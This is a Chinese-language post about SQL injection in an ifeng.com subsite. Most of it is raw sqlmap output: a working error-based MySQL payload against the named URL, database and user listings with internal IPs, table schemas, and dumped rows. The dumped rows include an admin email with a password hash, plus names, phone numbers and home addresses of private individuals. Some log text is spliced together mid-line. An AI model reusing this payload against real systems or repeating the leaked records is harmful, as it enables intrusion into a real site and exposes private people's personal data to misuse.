凤凰网分站SQL注入漏洞_MySQL

凤凰网分站SQL注入漏洞注入地址：http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined

单引号回车后报错，爆路径，于是丢到sqlmap中跑

之后就什么都有了

首先是数据库列表

之后查看是否是dba之后查看用户列表

完完全全的暴露了内网的ip和其他数据库地址

剩下的看代码吧

 

<code>sqlmap identified the following injection points with a total of 1624 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>database management system users [234]:<br>[*] ''@'localhost'<br>[*] 'B74wNuTbbx'@'10.11.2.89'<br>[*] 'B74wNuTbbx'@'10.11.2.90'<br>[*] 'B74wNuTbbx'@'10.13.2.134'<br>[*] 'B74wNuTbbx'@'10.13.2.135'<br>[*] 'B74wNuTbbx'@'10.13.2.176'<br>[*] 'B74wNuTbbx'@'10.13.2.177'<br>[*] 'B74wNuTbbx'@'220.181.67.192'<br>[*] 'iadmin'@'211.151.61.77'<br>[*] 'root'@'10.13.2.132'<br>[*] 'root'@'10.13.2.134'<br>[*] 'root'@'10.13.2.135'<br>[*] 'root'@'10.13.2.176'<br>[*] 'root'@'10.13.2.177'<br>[*] 'root'@'127.0.0.1'<br>[*] 'root'@'192.168.2.162'<br>[*] 'root'@'192.168.2.167'<br>[*] 'root'@'220.181.24.100'<br>[*] 'root'@'220.181.24.166'<br>[*] 'root'@'220.181.24.2'<br>[*] 'root'@'220.181.67.192'<br>[*] 'root'@'localhost'<br>[*] 'zabbix'@'127.0.0.1'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>[1 table]<br>+------+<br>| dkjs |<br>+------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>[32 tables]<br>+-----------------------+<br>| wiki_activation	 |<br>| wiki_advertisement	|<br>| wiki_attachment	 |<br>| wiki_autosave		 |<br>| wiki_banned		 |<br>| wiki_blacklist		|<br>| wiki_category		 |<br>| wiki_channel		|<br>| wiki_comment		|<br>| wiki_creditdetail	 |<br>| wiki_doc			|<br>| wiki_docreference	 |<br>| wiki_edition		|<br>| wiki_focus			|<br>| wiki_friendlink	 |<br>| wiki_language		 |<br>| wiki_lock			 |<br>| wiki_plugin		 |<br>| wiki_pluginhook	 |<br>| wiki_pluginvar		|<br>| wiki_pms			|<br>| wiki_regular		|<br>| wiki_regular_relation |<br>| wiki_regulargroup	 |<br>| wiki_session		|<br>| wiki_setting		|<br>| wiki_style			|<br>| wiki_synonym		|<br>| wiki_task			 |<br>| wiki_user			 |<br>| wiki_usergroup		|<br>| wiki_word			 |<br>+-----------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATsqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[22 columns]<br>+------------+-----------------------+<br>| Column	 | Type				|<br>+------------+-----------------------+<br>| birthday | int(10) unsigned	|<br>| checkup	| int(10) unsigned	|<br>| creates	| mediumint(8) unsigned |<br>| credits	| int(10)			 |<br>| edits	| mediumint(8) unsigned |<br>| email	| char(50)			|<br>| gender	 | tinyint(1)			|<br>| groupid	| smallint(6) unsigned|<br>| image	| varchar(255)		|<br>| language | varchar(20)		 |<br>| lastip	 | char(15)			|<br>| lasttime | int(10) unsigned	|<br>| location | varchar(30)		 |<br>| password | char(32)			|<br>| regip	| char(15)			|<br>| regtime	| int(10) unsigned	|<br>| signature| text				|<br>| style	| varchar(20)		 |<br>| timeoffset | varchar(20)		 |<br>| uid		| mediumint(8) unsigned |<br>| username | char(15)			|<br>| views	| int(10) unsigned	|<br>+------------+-----------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[10 entries]<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email		 | gender | lastip		 | checkup | regtime	| credits | creates | lasttime | location | username		| birthday | password						 | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br>| 1 | 4	 | <blank> | default | 0	 | 59	| <blank> | wuwei@ifeng.com | 0	| 220.181.24.2 | 1	 | 1270174931 | 21	| 0	 | 1270174967 | <blank>| house_admin	 | 0		| e10adc3949ba59abbe56e057f20f883e | zh	 | <blank> | 8		|<br>| 2 | 4	 | <blank> | default | 2	 | 171 | <blank> | <blank>		 | 0	| 220.181.67.192 | 1	 | 0		| 41	| 1	 | 1286971633 | <blank>| 冠缨豺郎			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 3 | 2	 | <blank> | default | 0	 | 29	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| zhaoxiaoxiong | 0		| <blank>						| zh	 | <blank> | 8		|<br>| 4 | 4	 | <blank> | default | 44	| 825 | <blank> | <blank>		 | 0	| 220.181.67.192 | 1	 | 0		| 264	 | 23	| 1287390647 | <blank>| 漫巴			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 5 | 8	 | <blank> | default | 7	 | 1140| <blank> | <blank>		 | 0	| 220.181.24.2 | 1	 | 0		| 663	 | 124	 | 1270429517 | <blank>| 西瓜妹			 | 0		| <blank>						| zh	 | <blank> | 8		|<br>| 6 | 2	 | <blank> | default | 0	 | 29	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| zhuantou		| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 7 | 2	 | <blank> | default | 0	 | 30	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| c100			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 8 | 8	 | <blank> | default | 7	 | 1183| <blank> | <blank>		 | 0	| 220.181.24.2 | 1	 | 0		| 794	 | 150	 | 1270959387 | <blank>| 金鱼77			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 9 | 2	 | <blank> | default | 0	 | 31	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| qq15236958@sina | 0		| <blank>						| zh	 | <blank> | 8		|<br>| 10| 7	 | <blank> | default | 0	 | 793 | <blank> | <blank>		 | 0	| 220.181.24.2 | 1	 | 0		| 533	 | 102	 | 1270545218 | <blank>| qq15236958	| 0		| <blank>						| zh	 | <blank> | 8		|<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[11 entries]<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email | gender | lastip| checkup | regtime | credits | creates | lasttime | location | username	 | birthday | password | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br>| 100 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| yangganghong | 0		| <blank>| zh	 | <blank> | 8		|<br>| 101 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 肖张氏		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 102 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| hanruikai	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 103 | 2	 | <blank> | default | 0	 | 7	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| cbgwllcjt	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 104 | 2	 | <blank> | default | 0	 | 4	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| gk777		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 105 | 2	 | <blank> | default | 0	 | 4	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 品酸		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 106 | 2	 | <blank> | default | 0	 | 3	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| daiyb		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 107 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 欧阳君山		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 108 | 2	 | <blank> | default | 0	 | 3	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 小马不识途		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 109 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| gxy891029	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 110 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 晓飞416329	 | 0		| <blank>| zh	 | <blank> | 8		|<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_health<br>[35 tables]<br>+------------------------+<br>| wiki_activation		|<br>| wiki_advertisement	 |<br>| wiki_attachment		|<br>| wiki_autosave		|<br>| wiki_banned			|<br>| wiki_blacklist		 |<br>| wiki_category		|<br>| wiki_category_20100224 |<br>| wiki_channel		 |<br>| wiki_comment		 |<br>| wiki_creditdetail	|<br>| wiki_doc			 |<br>| wiki_doc_20100224_20 |<br>| wiki_doc_temp_copy	 |<br>| wiki_docreference	|<br>| wiki_edition		 |<br>| wiki_focus			 |<br>| wiki_friendlink		|<br>| wiki_language		|<br>| wiki_lock			|<br>| wiki_plugin			|<br>| wiki_pluginhook		|<br>| wiki_pluginvar		 |<br>| wiki_pms			 |<br>| wiki_regular		 |<br>| wiki_regular_relation|<br>| wiki_regulargroup	|<br>| wiki_session		 |<br>| wiki_setting		 |<br>| wiki_style			 |<br>| wiki_synonym		 |<br>| wiki_task			|<br>| wiki_user			|<br>| wiki_usergroup		 |<br>| wiki_word			|<br>+------------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_health<br>Table: wiki_user<br>[11 entries]<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email | gender | lastip		 | checkup | regtime | credits | creates | lasttime | location | username	 | birthday | password | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br>| 100 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 新娘jiujiu	 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 101 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 江湖一鸣		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 102 | 2	 | <blank> | default | 0	 | 40	| <blank> | <blank> | 0	| 59.175.185.178 | 1	 | 0	 | 21	| 0	 | 1267751010 | <blank>| erxy		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 103 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| fuf			| 0		| <blank>| zh	 | <blank> | 8		|<br>| 104 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 墨侃			 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 105 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| maiky1987	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 106 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| yantachenzhong | 0		| <blank>| zh	 | <blank> | 8		|<br>| 107 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| chen0928	 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 108 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 高老庄0560		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 109 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 为了国家的80后	 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 110 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| bxbglg123	| 0		| <blank>| zh	 | <blank> | 8		|<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>[1 table]<br>+------+<br>| dkjs |<br>+------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>Table: dkjs<br>[3 entries]<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br>| id| city	| name | story			 | phone	 | school	 | is_wap | photo3 | verify | photo2 | photo1 | address		 | province | submit_time		 |<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br>| 122 | 南阳	| 李果 | 失业，多次评为优秀教师，模范班主任 | 13037606030 | 河南邓州市穰东镇葛营小学 | 0	| 4	| yes	| 4	| 4	| 河南省邓州市穰东镇前庄村轩寺组 | 河南	 | 2010-02-05 16:08:03 |<br>| 123 | <blank> | 晓清 |				 | 13017329166 | 某学校		| 0	| 4	| yes	| 4	| 4	| 湖南			| 湖南	 | 2010-02-05 16:14:31 |<br>| 124 | 梧州	| 郭伟民|				 | 13878431590 | 岑溪市樟木镇思孟联办中学 | 0	| 4	| yes	| 4	| 4	| 岑溪市城中路20号	 | 广西	 | 2010-02-05 16:14:38 |<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or 